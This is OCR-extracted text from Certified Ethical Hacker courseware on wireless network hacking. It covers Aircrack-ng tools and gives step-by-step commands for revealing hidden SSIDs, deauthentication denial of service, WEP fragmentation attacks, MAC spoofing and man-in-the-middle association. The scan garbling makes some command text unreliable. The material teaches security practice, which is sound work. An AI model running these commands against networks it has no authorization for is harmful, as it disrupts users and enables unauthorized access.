] W1 r*l«s P*ck*t Info Sign*! kvtl: 0144 (68) R«t«: S4.0 Mbps Band: 802.1 lg Ch*nr*J: 11 • 2462 MH* Date: 7-X1I-2006 Tim•: 13:21:5S .677507 Capture: Off

Decoded packet information for the selected packet

Packets: 29,6931Keys: W E P.W PA

Auto-saving: o ff

Rules: O fu

http ://w w w . tamos, com
Copyright © b y

EG-G*ancil. All

Rights Reserved. Reproduction is Strictly Prohibited

W i-Fi Packet Sniffer: Com m View for W i-F i
Source: http://www.tamos.com CommView for Wi-Fi is a wireless network monitor and analyzer for 802.11 a/b/g/n networks. It captures every packet on the air to display important information such as the list of access points and stations, per-node and per-channel statistics, signal strength, a list of packets and network connections, protocol distribution charts, etc. By providing this information, CommView for Wi-Fi can help user view and examine packets, pinpoint network problems, and troubleshoot software and hardware. It includes a VoIP module for in-depth analysis, recording, and playback of SIP and H.323 voice communications. Packets can be decrypted utilizing user-defined W EP or WPA-PSK keys and are decoded down to the lowest layer. With over 70 supported protocols, this network analyzer allows users to see every detail of a captured packet using a convenient tree-like structure to display protocol layers and packet headers. Additionally, the product provides an open interface for plugging in custom decoding modules. W EP and WPA key retrieval add-ons are available subject to terms and conditions. This application runs under Windows XP/2003/Vista/2008/7 and requires a compatible wireless network adapter.

Module 15 Page 2278

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

A

C o m m V ie w fo r W iF i - D -l in k A ir P r e m ie r O W I- A G 5 3 0 W 1 r e l * * « P ( ‫ ־‬I A d a p t e r F ie Se arch View Took Settings Rules Help

- i n i x|

a

a

1

0

9

1

1

?

». 1 w .&<2
1 ^ j Packcts | Loggng I

Nodes | (M j Channels | ♦fr Latest IP Connections

1 /

Rules |

Alarms |

MNGT/BEA...

IP/UDP IP/UDP ARP REQ
MNGT/BEA...

MyAP GemtekTe... GemtekTe... GemtekTe... MyAP 08 00 4S CO 50 41 02 00 A8 18 2C B3 00 00 40

Broadcast 01:00:5E:... 33:33:00:... Broadcast Broadcast

N/A 192.168.0.4 158.22.2SC.0 192.168.0.4 N/A

N/A 239.2SS.2... 0.0.0.12 192.168.0.1 N/A

N/A 1900 1900 N/A N/A .A

Reconstruct TCP Session
Quick F fter O p en P ac k e t(s ) in New W indow C rea te Abas ► ►

«a...
)ted...

) t e d . . .

‫מ‬ 0‫״‬ .

0x0000 OxOOlO 0x0020 0x0030 0x0040

00 00 OF 3D B9-05 00 00 14 A5 2D 61 2F OC EC 20 A 8 - A A A A 03 00 00 00 08 00 4F 2“ 01 0 R a w contents of the packet DS 0. ____ _. .. .. .. _ _

9 6

C o p y Address

K . A“ P.

C o p y Packet Se n d P ac ket(s) S a v e P ac k e t(s ) A s ... Sm artW hois ► ►

11

Q Wlwl«» Packet Info & nel kvd: 0x44 (88) R *t: 54.0 Mbps

9

-

$ 02.119

D e c o d e d packet information for the selected packet
Clear Packet Buffer Decode As Font ► ►

Channel: 1 1 •2462 MHz Date: 7 •Jul-2006 Tim♦13 ‫־‬a155W750?
C ap tu re: O ff

Packets: 29,693 | K eys: W E P ,W P A

Auto-saving: Off

Rules: OfL

FIGURE 15.43: CommView for Wi-Fi screenshot

Module 15 Page 2279

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

1

What Is Spectrum Analysis?
RF spectrum analyzers exam ine Wi-Fi radio transm issions and m easure the pow er (am plitude) of radio signals and RF pulses, and transform these m easurem ents into num eric sequences

Urt1fw4

CEH
ilhiul lUtbM

J

Spectrum analyzers employ statistical analysis to plot spectral usage, quantify "air quality,‫ ״‬and isolate transmission sources

J

RF spectrum analyzers are used by RF technicians to install and maintain wireless networks, and identify sources of interference

J

Wi-Fi spectrum analysis also helps in wireless attack detection, including Denial of Service attacks, authentication/ encryptions attacks, network penetration attacks, etc.

J

Spectrum analysis tools: © Wi-Spy and Chanalyzer © AirMagnet Wi-Fi Analyzer » WifiEagle

Copyright © by EG-GtODCil. All Rights R eserved. Reproduction is Strictly Prohibited.

— 0 1 What Is Spectrum Analysis?
RF spectrum analyzers examine the Wi-Fi radio transmission, measure the power (amplitude) of radio signals and RF pulses, and transform these measurements into numeric sequences. Spectrum analyzers employ statistical analysis to plot spectral usage, quantify "air quality," and isolate transmission sources. RF spectrum analyzers are used by RF technicians to install and maintain wireless networks, and identify sources of interference. Wi-Fi spectrum analysis also helps in wireless attack detection, including denial-of-service attacks, authentication/ encryptions attacks, network penetration attacks, etc. Traditional spectrum analyzers are purpose-built test equipment. Wi-Fi spectrum analyzers can be used in many ways. Consider the task of identifying and avoiding interference between the WLAN and devices competing for the same frequencies. If you suspect RF interference, turn off the affected AP or station, then use one of the Wi-Fi spectrum analyzer tools to see whether any device is transmitting within a given frequency range. If the interference exists, then the users can eliminate the interference by reconfiguring the WLAN to another band or channel that don't overlap other frequencies in the vicinity. Or else try to remove the interference or shield the source of interference. Spectrum analysis tools: Wi-Spy and Chanalyzer, AirMagnet Wi-Fi Analyzer, WifiEagle, etc.

Module 15 Page 2280

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Wi-Fi P acket Sniffers
h t t p :/ / w w w .n e t s c o u t .c o m
Sniffer Portable Professional Analyzer

CEH

h ttp :/ / w w w .a ir s c a n n e r .c o m

Airscanner Mobile Sniffer

h ttp :/ / w w w .c o la s o f t ,c o m

Capsa WiFi

M

h t t p :/ / w w w .n e t w o r k in s t r u m e n t s .c o m

Observer

h t t p :/ / w w w .p a e s s le r .c o m

PRTG Network Monitor

h tt p :/ / w if is c a n n e r .s o u r c e fo r g e .n e t

WifiScanner

h ttp :/ / w w w .m o n o lit h 8 1 .d e \
NetworkMiner

ApSniff

BBS aac

h t t p :/ / w w w .m o n o lit h 8 1 .d e

Mognet

h ttp :/ / w w w .n e t r e s e c .c o m

::[nnl EI h b I

h ttp :/ / ip e r f .s o u r c e fo r g e .n e t

Iperf

Copyright © b y

EG-G*ancil. All

Rights Reserved. Reproduction is Strictly Prohibited.

‫ י‬.‫י‬

W i-Fi Packet Sniffers

Wi-Fi packet sniffers help you to monitor, detect, and troubleshoot critical network and application performance problems. Various Wi-Fi packet sniffers that are readily available in the market are listed as follows: 9 9 9 9 9 9 9 9 9 9 Sniffer Portable Professional Analyzer available at http://www.netscout.com Capsa WiFi available at http://www.colasoft.com PRTG Network Monitor available at http://www.paessler.com ApSniff available at http://www.monolith81.de NetworkMiner available at http://www.netresec.com Airscanner Mobile Sniffer available at http://www.airscanner.com Observer available at http://www.networkinstruments.com WifiScanner available at http://wifiscanner.sourceforge.net Mognet available at http://www.monolith81.de Iperf available at http://iperf.sourceforge.net

Module 15 Page 2281

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

W ireless H acking M ethodology

CEH

The objective of the wireless hacking methodology is to compromise a Wi-Fi network in order to gain unauthorized access to network resources

C o m p ro m ise the W i-Fi N e tw o rk

C ra c k

Wi-Fi Encryption

Launch Wireless Attacks

Copyright @ b y iC - G 0 U C il. All Rights Reserved. Reproduction is Strictly Prohibited.

W ireless Hacking Methodology
C vAs the discovery, mapping, and analysis of the target wireless network is done, it's time to launch attacks on it. Many active attacks such as fragmentation attacks, MAC spoofing attacks, denial-of-service attacks, ARP poisoning attacks, etc. can be launched against wireless networks. The following slides give you a detailed explanation about each attack and how it is launched.

Module 15 Page 2282

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

A ircrack-ng Suite
Aircrack-ng is a n etw ork so ftw are suite consisting of a detector, packet sniffer, W E P and W PA/W PA2-PSK cracker and analysis tool for 802.11 wireless networks. This program runs under Linux and W indow s.

CEH
©
http://www.aircrack-ng.org

Airgraph-ng
Used for traffic generation, fake authentication, packet replay, and ARP request injection
Creates client to AP relationship and common probe graph from airodum p file

\ f

Airodump-ng
Used to capture packets o f raw 802.11 frames and collect W E P IVs

Airolib-ng
Store and manage essid and password lists used in W P A / W P A 2 cracking

Airserv-ng
Allow s multiple programs to independently use a Wi-Fi card via a client-server TCP connection

Airmon‫־‬ng
Used to enable m onitor m ode on wireless interfaces from managed m ode and vice versa

Airtun-ng

Packetforge-ng
Allows you to communicate via a WEP-encrypted access point (AP) without knowing the WEP key
Used to create encrypted packets th at can subsequently be used for injection : f I

Tkiptun-ng
Creates a virtual tunnel interface to monitor encrypted traffic and inject arbitrary traffic into a network

/ Wesside-ng
Incorporates a num ber of techniques to seamlessly obtain a L W E P key in m in u te s !

0

Injects frames into a WPA TKIP network with

QoS, and can recover • MIC key and keystream from Wi-Fi traffic

Copyright © b y iC - G 0 U C il. All Rights Reserved. Reproduction is Strictly Prohibited.

Aircrack-ng Suite
1 9 Aircrack-ng is a network software suite consisting of a detector, packet sniffer, WEP, and WPA/WPA2-PSK cracker and analysis tool for 802.11 wireless networks. This program runs under Linux and Windows. It works with any wireless card whose driver supports raw monitoring mode and can sniff 802.11a, 802.11b, and 802.l l g traffic. The suite includes many programs. The following is the list of programs included in the Aircrack-ng suite: Program Name Airbase‫־‬ng Aircrack-ng Airdecap-ng Description Captures WPA/WPA2 handshake and can act as an ad-hoc access point Defacto WEP and WPA/ WPA2-PSK cracking tool Decrypt WEP/WPA/ WPA2 and can be used to strip the wireless headers from Wi-Fi packets Removes WEP cloaking from a pcap file Provides status information about the wireless drivers on your system

Airdecloak-ng Removes W EP cloaking from a pcap file Airdrop-ng Aireplay-ng

This program is used for targeted, rule-based deauthentication of users Used for traffic generation, fake authentication, packet replay, and ARP

Module 15 Page 2283

Ethical Hacking and Countermeasures Copyright © by EC-C0l1nCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

request injection Airgraph-ng Creates client to AP relationship and common probe graph from airodump file Used to capture packets of raw 802.11 frames and collect W EP IVs Store and manage ESSID and password lists used in WPA/ WPA2 cracking Allows multiple programs to independently use a Wi-Fi server TCP connection card via a client-

Airodump-ng Airolib-ng Airserv-ng

Airmon-ng

Used to enable monitor mode on wireless interfaces from managed mode and vice versa Injects frames into a WPA TKIP network with QoS, and can recover MIC key and keystram from Wi-Fi traffic Allows you to communicate via a WEP-encrypted access point (AP) without knowing the WEP key Used to create encrypted packets that can subsequently be used for injection Creates a virtual tunnel interface to monitor encrypted traffic and inject arbitrary traffic into a network Incorporates a number of techniques to seamlessly obtain a W EP key in minutes
TABLE 15.10: List of programs in the Aircrack-ng suite

Airtun-ng

Easside-ng

Packetforge-ng

Tkiptun-ng

Wesside-ng

Module 15 Page 2284

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

How to R e v e a l Hidden SSIDs
0^
. . .

Command Prompt
‫*יי‬

Q] 9

Step 1: Run airmon-ng in monitor mode

c:\>a!rmon-ng s ta r t e t n i

C:\>airodum p-ng - iv s - w r i t e c a p tu r e e t h l BSSID 02:24:2B:CD:68:EF 02:24:2B:CD:68:EE 00:14:60:95:6C:FC 00:22:3F:AE:68:6E PW R 99 99 99 76 RXQ 5 9 0 70 Beacons 60 75 15 157 #Data, #/s 3 2 0 1 0 0 0 0 CH 1 5 9 11 MB 54e 54e 54e 54e ENC OPN OPN W EP W EP W EP W EP CIPHER AUTH ESSID IAM ROGER COMPANYZONE H OM E

1 ■

Step 2: Start airodump to discover SSIDs on interface

\

clength: 10> •

....................... • y BSSID 00:22:3F:AE:68:6E 00:22:3F:AE:68:6E Station 00:17:9A:C3:CF:C2 00:1F:5B:BA:A7:CD PW R -1 76 Rate 1- 0 le-54 Lost 0 0 Packets 1 6 Probes

*• Hidden SSID

Command Prompt
C:\>aireplay-ng - d e a u th 11 -a 00:22:3F:AE:68:6E

‫[ם‬

Step 3: Oeauthenticate (deauth) the client to reveal hidden SSID using Aireplay-ng

Command Prompt
Step 4: Switch to BSSID 00:22:3F:AE:68:6E P W R RXQ Beacons #Data, #/s CH M B ENC CIPHER AUTH ESSID 76 70 157 1 0 11 54e W E P W EP Secret SSID airodump to see the revealed SSID

C o pyrigh t © b y EC-CMMCil. All Rights Reserved.;R ep rod u ctio n is Strictly Probfbited.

fe C

How to Reveal Hidden SSIDs

Hidden SSIDs can be revealed by using the Aircrack-ng suite. The process involves the following steps: Step 1: Run airmon-ng in monitor mode Step 2: Start airodump to discover SSIDs on interface
Com m and Pro m p t
c:\>airm0 n-ng start e th l C:\>airodump-ng —ivs --write capture e t h l BSSID 02:24:2B:CD:68:EF 02:24:2B:CD:68:EE 00:14:6C:95:6C:FC 00:22:3F:AE:68:6E BSSID PWR 99 99 99 76 RXQ 5 9 0 70 Beacons 60 75 15 157 PWR -1 76 #Data, #/s 0 3 2 0 1 Rate 1-0 le-54 0 0 0 CH 1 5 9 11 Lost 0 0 MB 54e 54e ENC OPN WEP WEP WEP Probes CIPHER AUTH ESSID IAMROGER COMPANYZONE ■‫־־‬ HOME • <length: 10>: ....................... ‫■ * ־‬ Station Packets 1 6 00:22:3F:AE:68:6E 00:17:9A:C3:CF:C2 00:22:3F:AE:68:6E 00:1F:5B:BA:A7:CD 54e OPN

□ ▲ ■

54e WEP

Hidden SSID

F IG U R E 15.44: Discovering Hidden SSIDs

Module 15 Page 2285

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Step 3: De-authenticate (deauth) the client to reveal hidden SSID using Aireplay-ng j g l Command Prompt
| c:\>aireplay-ng --deauth 11 -a 00 :2 2 :3 F:A E :6 8 :6 E

4

FIGURE 15.45: De-authenticating the client using Aireplay-ng

Step 4: Switch to airodump to see the revealed SSID 3S
BSSID

Command Prompt
PWR RXQ Beacons ffData, it/s CH MB ENC CIPHER AUTH ESSID 70 157 1 0 11 54eWEP WEP Secret SSID

‫ם‬

00:22:3F:AE:68:6E 76

FIGURE 15.46: Viewing the disclosed SSID using airodump

Module 15 Page 2286

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

F ragm entation Attack
M This attack does not reco ver the W E P key itself, but m erely obtains the PRGA

CEH
(•rtifwtf I til1(41 Nm Im

■ A fragm entation attack, when successful, can obtain 1500 bytes of PR G A (pseudo random generation algorithm)

The PR G A can then be used to generate packets w ith packetforge‫־‬ng which are in turn used for various injection attacks It requires at least one data packet to be received from the access point in order to initiate the attack

Command Prompt
C:\> airep lay-ng -5 -b 00:1 4 :6C :7 E:4 0 :8 0 -h 0 0 :0 F :B 5 :A B :C B :9 D athO

Command Prompt
Saving chosen packet injreplay src-0124-161120.capC Data packet found? *‫י‬ ‫••••■••••••••••••••••••יי‬ Sending fragmented packet Got RELAYED packet?! PR G A is stored in the file Thats our ARP packet? Trying to get 384 bytes of a keystrean Got RELAYED packet?? Thats our ARP packet? Trying to get 1500 bytes of a keystream Got RELAYED packet?? Thats our ARP packet? Saving keystream in fragment-0124-161129.xor Now you can build a packet with packetforge-ng out of that 1500 bytes keystream

Waiting for a data packet.. . Read 96 packets... Size: 120, FrooDS: 1, ToDS: 0 (WEP) BSSID - 00:14:6C:7E:40:80 Dest. MAC - 00:OF: B5: AB: CB:9D Source MAC - 00:D0:CF:03:34:8C 0x0000: 0x0010: 0x0020: 0x0030: 0x0040: 0x0050: 0x0060: 0x0070: Use this 0842 0201 OOOf OOdO cf03 348c 6d6d bleO 92a8 a21d 2a70 49cf 7013 f7f3 5953 fd55 66a2 030f 517f 1544 bd82 0505 933f af2f packet ? y b5ab e0d2 039b eef8 1234 472d ad77 740e cb9d 4001 ca6f 19b9 5727 2682 fe9a 0014 0000 cecb 279c 146c 3957 cd99 6c7e 2b62 5364 9020 eeaa 8429 a43c 4080 .B........ l-«. 7a01 ---4.. .0...♦bz. 6el6 1m ..... o. .Sdn. 30c4 ..*pi....0. a594 P...YS.4W.1___ 9ca5 .Uf...G-&.9W.) .. 52a1 QQD. ..w....<R.

Use PRGA with packetforge-ng to generate packet(s) to be used for various injection attacks
Copyright © b y EG-G(IIIICil. All Rights Reserved. Reproduction Is Strictly Prohibited.

Fragm entation Attack
When fragmentation attack is successful, it can obtain 1500 bytes of PRGA (pseudo random generation algorithm). This attack does not recover the WEP key itself, but merely obtains the PRGA. The PRGA can then be used to generate packets with packetforge-ng, which are in turn used for various injection attacks. It requires at least one data packet to be received from the access point in order to initiate the attack. Basically, the program obtains a small amount of keying material from the packet then attempts to send ARP and/or LLC packets with known content to the access point (AP). A larger amount of keying information can be gathered from the replay packet, if the packet is successfully echoed back by the AP. This cycle is repeated several times. Use PRGA with packetforge-ng to generate packet(s) to be used for various injection attacks.

Module 15 Page 2287

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

C o m m an d P ro m p t C:\>aireplay-ng -5 -b 00:14:6C:7E:40:80-h 00:0F:B5:AB:CB:9Dath0
Waiting for a data packet... Read 96 packets... Size: 120, FromDS: 1, ToDS: 0 (WEP) BSSID = 00:14:6C:7E:40:80 Dest. MAC = 00:O F :B 5 : A B :CB:9D Source MAC = 00:DO:C F :03:34:8C 0842 0201 OOOf OOdO cf 03 348c 6d6d bleO 92a8 a21d 2a70 49cf 7013 f 7f 3 5953 fd55 66a2 030f 517f 1544 bd82 0505 933f a£2£ Use this packet ? y 0x0000 0x0010 0x0020 0x0030 0x0040 0x0050 0x0060 b5ab e0d2 039b eef 8 1234 472d ad77 740e cb9d 4001 ca6f f 9b9 5727 2682 fe9a 0014 0000 cecb 279c 146c 3957 cd99 6c7e 2b62 5364 9020 eeaa 8429 a43c 4080 7a01 6el6 30c4 a594 9ca5 52al .B___ ..... 1-0. ___ 4. ..e ...+ b z . nun. ... ...o ..Sdn. ..*pi.___ ' 0 . p . ..YS .4 W ' .1 ___ .Uf.. .G - & .9W.).. Q f l .D. .. w .... < R . ...?./t.

FIGURE 15.47: Fragmentation attack screenshot

m

■ ‫״׳׳‬

‫״׳‬

g g C o m m an d P ro m p t » m Saving chosen packet in;replay_src-0124-161120.cap. Data packet found! Sending fragmented packet -----------------------Got RELAYED packet!! PRGA is stored in the file Thats our ARP packet! Trying to get 384 bytes of a keystream Got RELAYED packet!! Thats our ARP packet! Trying to get 1500 bytes of a keystream Got RELAYED packet!! Thats our ARP packet! Saving keystream in fragment-0124-161129.xor Now you can build a packet with packetforge-ng out of that 1500 bytes keystream

FIGURE 15.48: Screenshot showing PRGA location

Module 15 Page 2288

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

How to Launch MAC Spoofing Attack
J configured in an access point

CEH

M A C spoofing attackers change the M A C address to that of an au thenticated user to bypass the M A C filtering

Linux Shell
[root@localhost root]# ifconfig wlanO d ow n ..................................

[root@localhost root]# ifconfig wlanO h w e th e r 02:25:ab:4c:2a:bc [rootgaiocalhost root]# ifconfig wlanO up

Show OnlyAdive Netwoik Adaplets New Spooled MAC Address

Update MAC

I 00 -| 05 -| 56 1 360 SYSTEMS (000556! Spooled MAC Address |Not Spooled Active MAC Address |A4-BA-0B-FD-86-63

|

5

6

| - 88 | -‫ ־‬55‫ | ־‬j< J

Restart Adapter Random Refresh

|

IPConfig MAC List Exit

SMAC is a MAC address changer for Windows systems Randomly generate any New MAC Address or based on a selected manufacturer

3
J Netwcxk Connection jLocal Area Connection

-*‫־‬

pci\ven_14e4dev_1692$ub$ys_04261028

Copyright © b y

EG-Gtlincil. All

Rights Reserved. Reproduction is Strictly Prohibited.

S

How to Launch a M A C Spoofing Attack

A MAC address is a unique identifier assigned to the network card. Some networks implement MAC address filtering as a security measure. MAC spoofing attackers change the MAC address to that of an authenticated user to bypass the MAC filtering configured in an access point. To spoof a MAC address, the attacker simply need to set the value returned from ifconfig to another hex value in the format of aa:bb:cc:dd:ee:ff. To make the change the sudo command requires the root password. SMAC is a MAC address changer for Windows systems. Randomly generate any new MAC address or based on a selected manufacturer.
Linux Shell
[root@localhost root]# ifconfig wlanO dow n ..................................

[root@localhost root]# ifconfig wlanO hw eth er 02:25:ab:4c:2a:bc [root@localhost root]# ifconfig wlanO up ..................................

FIGURE 15.49: Spoofing MAC address to another new hex value

Module 15 Page 2289

Ethical Hacking and Countermeasures Copyright © by EC-C0l1nCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

F

Show Only Active Network Adapters

Update MAC Restart Adapter

Remove MAC IPConfig MAC List Exit

New Spoofed MAC Address

00 - | 05 - | 56 - | 55 - | 88 - | 56|
1 360 SYSTEMS [000556] Spoofed MAC Address |Not Spoofed Active MAC Address (A4-BA-DB-FD-86-63

xj

Random Refresh

3
Network Connection |Local Area Connection

Hardware ID |pci\ven_14e4dev_1692subsys_04261028

FIGURE 15.50: Screenshot showing the new spoofed MAC address

Module 15 Page 2290

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

D en ia l of Service: Deauthentication and Disassociation Attacks

Client is authenticated and associated w ith AP

Client connects to netw ork Client is still authenticated but no longer associated w ith the AP

Client attempting to connect

Access Point (AP)

Attacker

D is a s s o c ia t io n A tt a c k
D cauth com m and: a i r e p l a y - n g — d e a u t h 2 5 - h <TARGET M AO b <AP M AO a t h l

Client is authenticated and associated w ith AP

Client is no longer authenticated or associated w ith the AP

<................ Attacker sends a Deauthenticate Request packet to take a single client offline

^
22Z1Z'. I : : : :

Access Point (AP)

Client fully connected

Attacker

D e a u t h e n t ic a t io n A tta c k s

D enial of Service: Deauthentication and # Disassociation Attacks
Wireless networks are susceptible to denial-of-service attacks. Usually these networks operate in unlicensed bands and the transmission of data takes the form of radio signals. The designers of the MAC protocol aimed at keeping it simple, but it has its own set of flaws that are more attractive to DoS attacks. The possibility of DoS attacks on wireless networks is greater due to the relationship of the physical, data-link, and network layers. The DoS attacks on wireless networks can be performed using the two techniques: disassociation attacks and deauthentication attacks. In a disassociation attack, the attacker makes the victim unavailable to other wireless devices by destroying the connectivity between station and client.
C lient is a u th e n tica te d and asso ciated w ith A P

l

‫ג‬
C lient con n ects to n e tw o rk

'M
Client attempting to connect
Client is still au th en ticated but no longer associated w ith the A P

'Vs/
Access Point (AP)

D isa sso cia tio n A tta ck

FIGURE 15.51: Diagrammatical representation of Disassociation Attack

Module 15 Page 2291

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

In a deauthentication attack, the attacker floods station(s) with forged deauthenticates or disassociates to disconnect users from an AP.

Attacker

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Man-in-the‫־‬Middle Attack
Attacker sniffs the victim's wireless parameters (the MAC address, ESSID/BSSID, number of channels)

CEH

Victim is deauthenticated and starts to search all channels for a new valid AP

©
^

r %
Oeauthenticated

© u

£ ± < ... * a

Attacker sets a forged AP on a new channel with the original MAC address (BSSID) and ESSIO of the victim's AP

After the victim's successful association to the forged AP, the attacker spoofs victim to connect to the original AP

Attacker sits in between the access point and the victim and listens all the traffic

r-

©

r■

©

c

©

Victim Connects Connects*♦. to Forged AP *

*

j

‫י*־‬8 ‫א‬ .3
Copyright © b y

EG-G*ancil. All

Rights Reserved. Reproduction is Strictly Prohibited.

▼ ▼ A man-in-the-middle attack is an active Internet attack where the attacker attempts to intercept, read, or alter information between two computers. MITM attacks are associated with a 802.11 WLAN, as well as with wired communication systems. E a v e s d r o p p in g Eavesdropping is easy in a wireless network because there is no physical medium used to communicate. An attacker who is in an area near the wireless network can receive radio waves on the wireless network without much effort or many gadgets. The entire data frame sent across the network can be examined in real time or stored for later assessment. In order to prevent whackers from getting sensitive information, several layers of encryption should be implemented. WEP, data-link encryption, was developed for this purpose. If a security mechanism such as IPSec, SSH, or SSL is not used for transmission, the sent data is available to anyone, and is vulnerable to attack by whackers with an antenna. However, W EP can ked with tools freely available on the net. Accessing email using the POP or IMAP protocols is risky because these protocols can send email over a wireless network without any form of extra encryption. A determined whacker can potentially log gigabytes of WEP-protected traffic in an effort to post-process the data and break the protection.

*

Module 15 Page 2293

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

M a n ip u la t io n ^ Manipulation is the next level up from eavesdropping. Manipulation occurs on a 1 1 wireless link when an attacker is able to receive the victim's encrypted data, manipulate it, and retransmit the changed data to the victim. In addition, an attacker can intercept packets with encrypted data and change the destination address in order to forward these packets across the Internet. The figure that follows shows a step-by-step explanation of a man-in-the-middle attack:

Attacker sniffs the victim's wireless parameters (the MAC address, ESSID/BSSID, number of channels)

Sends a DEAUTH request to the victim with the spoofed source address of the victim's AP

Victim is deauthenticated and starts to search all channels for a new valid AP

c

©
* 9 : ®
D e au th en ticated

*3
Attacker sets a forged AP on a new channel with the original MAC address (BSSID) and I I I

S

<............ » % 3

<....

,3

After the victim's successful association to the forged AP, the attacker spoofs victim to connect to the original AP

Attacker sits in between the access point and the victim and listens all the traffic

0
‫־ז‬:

(6 )

£

3

;3

FIGURE 15.53: Steps explaining man-in-the-middle attack

Module 15 Page 2294

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

MITM Attack Using Aircrack-ng
Command Prompt
C:\>airmon‫־‬ng start ethl
BSSID 02:24:2B:CD:68:EF 02:24:2B:CD:68:EE 00:14:6C:95:6C:FC 1E:64:51:3B:FF:3E BSSID 1E:64:51:3B:FF:3E 1E:64:51:3B:FF:3E PW R 99 99 99 99 76 Station 00:17:9A:C3:CF:C2 00:1F:5B:BA:A7:CD 76 le-S4 0 R XQ 5 5 9 0 70 PW R R ate

C EH
Urt1fw4 ilhiul lUthM

^ ‫ייי‬
Beacons 60

‫■י‬ ■ ■ ■ ■
■■■■■■■■■‫י‬
CH 1 5 9 1 Lost MB 54e 54e 54e 0 11 ENC OPN OPN W EP 54e W EP W EP W EP 0 0 0

Step 1: Run airmon-ng in ‫יי‬
CIPHER AUTH

C:\>airodump‫־‬ng -ivs --write capture e th l
#Data, #/s 3

‫•י‬
ESSID

■ ■ ■

monitor mode Step 2: Start airodump to discover SSIDs on interface

1AM ROGER CO M PANYZON E HO M E SECRET SSID

Packets 6

Probes

10 1 - 0 1‫־‬

Command Prompt
C:\>aireplay-ng -deauth 5 -a 02:24:2B:CD:68:EE

Step 3: Deauthenticate (deauth) the client using Aireplay-ng

Command Prompt
C:\>aireplay-ng -10 -e SECRET_SSID -a le:64:51:3b:ff:3e -h 02:24:2B:CD:68:EE e th l
22:25:10 W a itin g for beacon fram e (BSSID : 1E:64:51:3B:FF:3E) on channel 11 22:25:10 Sending Authentication Request 22:25:10 A uthentication successful 22:25:10 Sending Association Request 22:25:10 Association su ccessfu l:-)

‫ם‬
<■

Step 4: Associate your wireless card (fake association) with the A P you are accessing with aireplay-ng

Copyright © by EG-CtUIICil. All Rights R eserved. Reproduction is Strictly Prohibited.

M IT M Attack Using Aircrack-ng
7 ‫ ־‬Aircrack-ng is a network software suite consisting of a detector, packet sniffer, WEP,

and WPA/WPA2-PSK cracker and analysis tool for 802.11 wireless networks. It can be used to perform man-in-the-middle attacks on wireless networks. To perform the MITM attack on WLANs using Aircrack-ng the user of the tool should follow these steps: Step 1: Run airmon-ng in monitor mode Step 2: Start airodump to discover SSIDs on interface

C:\>airmon-ng start ethl C:\>airodump-ng -ivs -write capture ethl
BSSID 02:24:2B:CD:68:EF 02:24:2B:CD:68:EE 00:14:6C:95:6C:FC 1E:64:51:3B:FF:3E BSSID 1E:64:51:3B:FF:3E 1E:64:51:3B:FF:3E PW R 99 99 99 76 Station 00:17:9A:C3:CF:C2 00:1F:5B:BA:A7:CD R XQ 5 9 0 70 Beacons 60 75 15 157 PW R -1 76 Rate 1 -0 le-54 #Data, 3 2 0 #/s 0 0 0 1 Lost 0 0 CH 1 5 9 MB 54e 546 54e 0 11 ENC OPN OPN W EP 54e W EP W EP W EP CIPHER AUTH ESSID IA M R O G ER CO M PA N Y ZO N E HOME SECRET SSID

L ■

Packets 1 6

Probes

F IG U R E 15.54: Discovering SSIDs using

Module 15 Page 2295

